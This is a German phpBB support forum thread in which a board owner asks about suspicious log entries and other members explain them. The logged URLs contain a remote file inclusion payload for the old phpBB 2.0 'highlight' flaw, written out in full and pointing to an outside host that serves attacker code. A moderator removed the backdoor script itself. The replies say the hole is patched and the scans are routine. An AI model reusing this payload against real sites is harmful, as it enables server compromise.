Ich denke dass wahr ein Hackversuch

Probleme bei der regulären Arbeiten mit phpBB, Fragen zu Vorgehensweisen oder Funktionsweise sowie sonstige Fragen zu phpBB im Allgemeinen.
Forumsregeln
phpBB 2.0 hat das Ende seiner Lebenszeit überschritten
phpBB 2.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 2.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf phpBB 3.1, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
Antworten
neuer
Mitglied
Beiträge: 10
Registriert: 12.04.2008 16:11

Ich denke dass wahr ein Hackversuch

Beitrag von neuer »

Vielleicht kann mir das mal jemand erklären und mir die ganze geschicht interpretieren.

also gefundene url im cback wahr:

Code: Alles auswählen

einmal so:
http://www.mein-forum.de//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://-censored-.biz/dur.haka??

und einmal so:

http://www.mein-forum.de/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://-censored-.biz/dur.haka??
und dann habe ich mal nachgeschaut was sich dahinter verbirgt und das wahr dann dass hier:

Code: Alles auswählen

--edit cYbercOsmOnauT-- Code eines Backdoorscripts gelöscht
Muss ich mir da sorgen machen ?
Was hat der Versucht zu machen?
jetzt habe ich noch ein anderes problem das laden der index dauert mit dem ff ewig lange und mit dem normalen explorer bekomm ich ne weiße seite, aber nicht immer nur manchmal ist das soo?





PS: sorry das der code den thread blääääät ;)
Benutzeravatar
cYbercOsmOnauT
Ehemaliges Teammitglied
Beiträge: 3820
Registriert: 18.02.2004 23:02
Wohnort: Göttingen
Kontaktdaten:

Beitrag von cYbercOsmOnauT »

1.) Ich hoffe im cback (dem Chris) hast Du den Code nicht gefunden. :D
2.) Sorgen musst Du Dir keine machen, denn wenn es geblockt wird, kommt es auch nicht durch.

Grüße,
Tekin
• prof. phpbb-Installation, Reparatur, Rettung nach Hackattacken, sowie PHP/JS Programmierung aller Art
Zend Certified Engineer, Linux Administrator und die Sicherheit von 34 Jahren Programmiererfahrung
• Interesse? Kontakt unter t.birduezen@web-coding.eu
neuer
Mitglied
Beiträge: 10
Registriert: 12.04.2008 16:11

Beitrag von neuer »

ok dank dir!!!


wäre es nicht eigentlich besser die bots schon mit der htaccess auszusperren????
Boecki91
Ehemaliges Teammitglied
Beiträge: 4744
Registriert: 18.06.2006 15:21

Beitrag von Boecki91 »

Wenn ich das richtig sehe versuchte das Script, einen alten Fehler in der highlight auszunutzen, doch die Lücke wurde bereits bei einem updatet geschlossen, das zeigt mal wieder wie wichtig Updates sind. :) Solche Angriffe laufen meist automatisiert ab und erzeugen somit immer ein Hintergrundrauschen, welchem fast jede Webseite ausgesetzt ist.
Standart: Am besten mit beiden Beinen auf dem Boden
Standardmäßig antworte ich nicht auf PMs
neuer
Mitglied
Beiträge: 10
Registriert: 12.04.2008 16:11

Beitrag von neuer »

Boecki91 hat geschrieben:Wenn ich das richtig sehe versuchte das Script, einen alten Fehler in der highlight auszunutzen, doch die Lücke wurde bereits bei einem updatet geschlossen, das zeigt mal wieder wie wichtig Updates sind. :) Solche Angriffe laufen meist automatisiert ab und erzeugen somit immer ein Hintergrundrauschen, welchem fast jede Webseite ausgesetzt ist.
was meinst du mit dem hintergrundrauschen?????

aber du hast recht updates sind ungemein wichtig. will garnicht ohne denen leben hehe.
Boecki91
Ehemaliges Teammitglied
Beiträge: 4744
Registriert: 18.06.2006 15:21

Beitrag von Boecki91 »

Diese Angriffe laufen automatisiert, das heißt ein Rechner sucht selbst (mit Google und Co) nach phpBB Foren, und ruft diese dann auf, um diese Anzugreifen, da diese Angriffsmethode aber auf einem altem Sicherheitsloch beruht, passiert deinem Forum gar nichts, und da solche "Angriffe" häufiger Vorkommen sagt man einfach "Hintergrundrauschen" dazu, ähnlich wie beim Radio, wenn man immer die richtige Frequenz benutzt hat man keine Probleme mit dem Hintergrundrauschen.
Standart: Am besten mit beiden Beinen auf dem Boden
Standardmäßig antworte ich nicht auf PMs
Antworten

Zurück zu „phpBB 2.0: Administration, Benutzung und Betrieb“